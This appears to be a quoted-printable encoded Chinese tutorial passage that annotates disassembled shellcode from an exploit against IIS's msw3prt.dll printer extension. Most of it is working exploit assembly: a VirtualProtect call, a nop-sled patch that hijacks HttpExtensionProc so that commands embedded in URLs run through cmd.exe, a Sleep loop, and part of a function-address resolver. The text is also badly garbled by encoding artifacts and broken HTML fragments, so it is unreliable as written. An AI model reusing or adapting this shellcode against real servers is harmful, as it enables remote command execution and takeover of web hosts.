=D4=DA=B9=D8=D3=DAISAPI=B5=C4=BD=E9=C9=DC=D6=D0= =CE=D2=C3=C7=CC=E1=B5=BD=A3=AC=CF=F3msw3prt.dll=D5=E2=D1=F9=B5=C4ISAPI=20 = Extension=B1=D8=D0=EB=CA=B5=CF=D6=B2=A2=CA=E4=B3=F6=BA=AF=CA=FDHttpExtens= ionProc=A3=AC=D5=E2=B8=F6=BA=AF=CA=FD=B8=BA=D4=F0=B4=A6=C0=ED=D3=C9IIS=D7= =AA=C0=B4=B5=C4HTTP=C7=EB=C7=F3=A1=A3=CE=D2=C3=C7=D5=E2=B8=F6Exploit=B5=C4= =B9=D8=BC=FC=BE=CD=CA=C7=B0=D1=D5=E2=B8=F6=BA=AF=CA=FD=B4=DB=B8=C4=D2=BB=CF= =C2=A3=AC=C8=CE=BA=CE=B6=D4=CB=FC=B5=C4=B5=F7=D3=C3=B6=BC=D6=B1=BD=D3=CC=F8= =C8=EB=CE=D2=C3=C7=BE=AB=D0=C4=C9=E8=BC=C6=B5=C4=A1=A2=BC=D9=B5=C4HttpExt= ensionProc=D6=D0=C8=A5=A1=A3=D5=E2=B8=F6=BC=D9=B5=C4HttpExtensionProc=BB=E1= =B4=A6=C0=ED=CE=D2=C3=C7=B5=C4=BA=DA=BF=CD=C3=FC=C1=EE=A3=BA=CB=FC=B0=D1=CF= =E2=C7=B6=D4=DAURL=C0=EF=C3=E6=B5=C4=BA=DA=BF=CD=C3=FC=C1=EE=CD=A8=B9=FD=CA= =E4=C8=EBPipe=B4=AB=B8=F8=D7=D3=BD=F8=B3=CCcmd.exe=A3=AC=B4=FD=B5=BDcmd.e= xe=D6=B4=D0=D0=CD=EA=C3=FC=C1=EE=BA=F3=D4=D9=B0=D1=BD=E1=B9=FB=CD=A8=B9=FD= =CA=E4=B3=F6Pipe=B4=AB=BB=D8=B8=F8=BC=D9HttpExtensionProc=A3=AC=D3=C9=CB=FC= =CD=A8=B9=FDmsw3prt.dll=B5=C4=C1=ED=D2=BB=B8=F6=BA=AF=CA=FDWriteClient=B7= =B5=BB=D8=B8=F8Browser=A1=A3=D5=E2=D1=F9MS=20 Internet = Explorer=BB=F2Netscape=BE=CD=B3=C9=C1=CB=CE=D2=C3=C7=B5=C4=BF=D8=D6=C6=D6= =D0=D0=C4=C8=A5=BF=D8=D6=C6=D3=D0=C2=A9=B6=B4=B5=C4Microsoft=20 = IIS=A1=A3

=B5=AB=CA=C7=CE=D2=C3=C7=D6=AA=B5=C0msw3prt.dll=D4=DA=D4= =D8=C8=EB=C4=DA=B4=E6=CA=B1=A3=AC=CB=FC=CB=F9=D5=BC=D3=C3=B5=C4=C4=DA=B4=E6= =B2=BF=B7=D6=CA=C7=B2=BB=BF=C9=D0=B4=B5=C4=A3=AC=C8=E7=B9=FB=CE=D2=C3=C7=C3= =B3=C8=BB=D0=DE=B8=C4HttpExtensionProc=BA=AF=CA=FD=A3=AC=CE=D2=C3=C7=BB=E1= =B5=C3=B5=BD=B7=C3=CE=CA=B3=F6=B4=ED=A1=A3=CB=F9=D2=D4=CE=D2=C3=C7=B1=D8=D0= =EB=CF=C8=B5=F7=D3=C3=BA=AF=CA=FDVirtualProtect=B0=D1HttpExtensionProc=C4= =C7=B2=BF=B7=D6=C4=DA=B4=E6=B8=C4=CE=AA=BF=C9=D0=B4=A3=AC=BE=CD=CF=F3=C9=CF= =C3=E6=B5=C4=D6=B8=C1=EE=C4=C7=D1=F9=A3=BA
*[edi-4]=CE=AA=D0=E8=D2=AA=D0= =DE=B8=C4=B7=C3=CE=CA=C8=A8=CF=DE=B5=C4=C4=DA=B4=E6=B5=D8=D6=B7=A3=AC=D5=E2= =C0=EF=BE=CD=CA=C7HttpExtensionProc=BA=AF=CA=FD=B5=C4=D6=B8=D5=EB=A3=AC=D4= =DAdallas=C9=CF=D5=E2=B8=F6=D6=B8=D5=EB=CE=AA0x6a8c77c0=A3=BB100h=D6=B8=B1= =BB=B8=C4=B1=E4=C8=A8=CF=DE=B5=C4=C4=DA=B4=E6=B4=F3=D0=A1=A3=BB4=CA=C7=CE= =D2=C3=C7=D0=E8=D2=AA=B5=C4=C8=A8=CF=DE=A3=BB=D7=A2=D2=E2HttpExtensionPro= c=D4=AD=C0=B4=B5=C4=C8=A8=CF=DE=B1=A3=C1=F4=D4=DA[edi+4]=D6=D0=A3=AC=D4=DA= =D0=DE=B8=C4=CD=EAHttpExtensionProc=BA=F3=CE=D2=C3=C7=B1=D8=D0=EB=B4=D3[e= di+4]=BB=D6=B8=B4=CB=FC=D4=AD=C0=B4=B5=C4=C8=A8=CF=DE=A1=A3

=BA=AF= =CA=FDVirtualProtect=B5=C4=B6=A8=D2=E5=A3=BA
BOOL=20 VirtualProtect
  LPVOID=20 lpAddress,       // region of=20 committed pages
  SIZE_T=20 = dwSize,          //=20 size of the region
  DWORD=20 flNewProtect,     // desired access=20 protection
  PDWORD lpflOldProtect   = // old=20 protection
);
*/
00EFFDFC=20 = 56            = ;  =20 = push        esi
00EFFDFD=20 = 53            = ;  =20 = push        ebx
00EFFDFE=20 = 8BDF           &nb= sp;=20 mov        =20 ebx,edi
00EFFE00 8DB7B0000000    =20 lea        =20 esi,[edi+0B0h]
00EFFE06=20 = 83C609          =20 add        =20 esi,9
00EFFE09 8D87C0000000    =20 lea        =20 eax,[edi+0C0h]
00EFFE0F=20 = 8906           &nb= sp;=20 mov         dword = ptr=20 [esi],eax
00EFFE11=20 = 83C6F7          =20 add         = esi,0FFFFFFF7h=20 //$esi=3D0x00EFFF3c
00EFFE14=20 = 8B7BFC          =20 mov         = edi,dword ptr=20 [ebx-4] //$edi=3D0x6a8c77c0
00EFFE17=20 B90F000000      =20 mov        =20 ecx,0Fh
00EFFE1C=20 = F3A4           &nb= sp;=20 rep movs    byte ptr [edi],byte ptr=20 = [esi]
/*
=D4=DAHttpExtensionProc=CB=F9=D5=BC=D3=D0=B5=C4=C4=DA=B4=E6= =B1=E4=B3=C9=BF=C9=D0=B4=D2=D4=BA=F3=A3=AC=CE=D2=C3=C7=CD=F9=C4=C7=C0=EF=CC= =EE=D0=B4=B5=C4=BF=B5=CE=F5=BB=CA=B5=DB=B5=C4=D2=C5=CA=E9=A3=BA=A1=B0=B4=AB= =CE=BB=D3=DA=BA=DA=BF=CD=C2=EB=A1=B1=A3=AC=B6=F8=B2=BB=CA=C7=D6=DA=CD=FB=CB= =F9=B9=E9=B5=C4BillGates=C2=EB=A1=A3=C4=E3=C3=C7=BF=B4=B5=BD=A3=ACHttpExt= ensionProc=D7=EE=BF=AA=CA=BC=B5=C415=B8=F6=D7=D6=BD=DA=B1=BB=CE=BB=D3=DA0= x00EFFF3c=B5=C415=B8=F6=D7=D6=BD=DA=B4=FA=CC=E6=A3=AC=D5=E215=B8=F6=D7=D6= =BD=DA=CA=C7=A3=BA
0x00EFFF38       = ;     =20 90 90 90 90 90 90 90 90 b8 00 00 f1 = exe.............
0x00EFFF48=20 77 ff d0 00 90 90 90 83 c4 04 60 e8 00 00 00 00=20 = w.........`.....
=B0=D1=CB=FC=C3=C7=B7=B4=BB=E3=B1=E0=A3=BA
> u = = esi
00EFFF3C  90       &n= bsp;      =20 = nop           &nbs= p;            = ;            =
00EFFF3D  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF3E  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF3F  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF40  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF41  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF42  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF43  90        = ;      =20 = nop           &nbs= p;            = ;            =
00EFFF44  B84CFFEF00      =20 mov        =20 = eax,0EFFF4Ch          &= nbsp;           &n= bsp;   
00EFFF49  FFD0    = ;        =20 = call        eax   =             &= nbsp;           &n= bsp;      =20

=D5=E2=D1=F9=C8=CE=BA=CE=B6=D4ISAPI Extension=20 = printer=B5=C4=B5=F7=D3=C3=BD=AB=D3=C9=D5=E2=C0=EF=CC=F8=B5=BD=B4=D30EFFF4= Ch=BF=AA=CA=BC=B5=C4=BC=D9HttpExtensionProc=C2=EB=D6=D0=A1=A3=CE=D2=BB=E1= =D4=DA=CF=C2=C3=E6=D2=BB=BD=DA=B8=F8=B3=F6=D5=E2=D0=A9=BC=D9=B5=C4HttpExt= ensionProc=BA=DA=BF=CD=C2=EB=A1=A3
*/
00EFFE1E=20 = 8BFB           &nb= sp;=20 mov        =20 edi,ebx
00EFFE20=20 = 5B            = ;  =20 pop         = ebx
00EFFE21=20 = 5E            = ;  =20 pop         = esi
00EFFE22=20 = 8D4704          =20 lea        =20 eax,[edi+4]
00EFFE25=20 = 50            = ;  =20 = push        eax
00EFFE26=20 = 8B4704          =20 mov         = eax,dword ptr=20 [edi+4]
00EFFE29=20 = 50            = ;  =20 = push        eax
00EFFE2A=20 6800010000      =20 = push        100h
00EFFE2F=20 = 8B57FC          =20 mov         = edx,dword ptr=20 [edi-4]
00EFFE32=20 = 52            = ;  =20 = push        edx
00EFFE33=20 = FF57EC          =20 call        dword = ptr=20 [edi-14h] //VirtualProtect
/*
As=20 = promised=A3=AC=D5=E2=C0=EF=CE=D2=C3=C7=BB=D6=B8=B4HttpExtensionProc=CB=F9= =D5=BC=D3=D0=B5=C4=C4=DA=B4=E6=D4=AD=C0=B4=B5=C4=C8=A8=CF=DE=A1=A3
*/<= BR>00EFFE36=20 6800DD6D00      =20 = push        6DDD00h
00EFFE3B=20 = FF57F0          =20 call        dword = ptr=20 [edi-10h] //Sleep
00EFFE3E=20 = EBF6           &nb= sp;=20 jmp        =20 = 00EFFE36
/*
=BA=C3=A3=A1=B5=D0=B7=BD=D5=F3=B5=D8=D2=D1=BE=AD=B1=BB=D5= =BC=C1=EC=A3=AC=D5=E2=D2=BB=BD=DA=BA=DA=BF=CD=D0=D0=B6=AF=CB=B3=C0=FB=B5=D8= =CD=EA=B3=C9=C1=CB=A3=AC=BF=C9=D2=D4=C8=A5=CB=AF=BE=F5=C1=CB=A1=A3=CF=C2=D2= =BB=BD=DA=BD=AB=D3=C9=BC=D9=B5=C4HttpExtensionProc=BA=DA=BF=CD=C2=EB=D6=B4= =D0=D0URL=C3=FC=C1=EE=A1=A3

Sleep=BA=AF=CA=FD=B5=C4=B6=A8=D2=E5=A3= =BA
VOID=20 Sleep(
  DWORD dwMilliseconds   // = sleep=20 = time
);
*/
/*
=CF=C2=C3=E6=CA=C7=B8=BA=D4=F0=BD=E2=BE=F6=D6=B8= =C1=EE=B1=ED=C4=DA=BA=AF=CA=FD=B5=D8=D6=B7=B5=C4=D7=D3=B3=CC=D0=F2=A3=BA<= BR>*/
00EFFE40=20 = 33C0           &nb= sp;=20 xor        =20 eax,eax
00EFFE42=20 = AC            = ;  =20 lods        byte ptr = [esi]
00EFFE43=20 = 85C0           &nb= sp;=20 = test        eax,eax  &n= bsp; //=D1=B0=D5=D2=BA=AF=CA=FD=C3=FB=D6=AE=BC=E4=B5=C4=BF=D5=B8=F1x= 00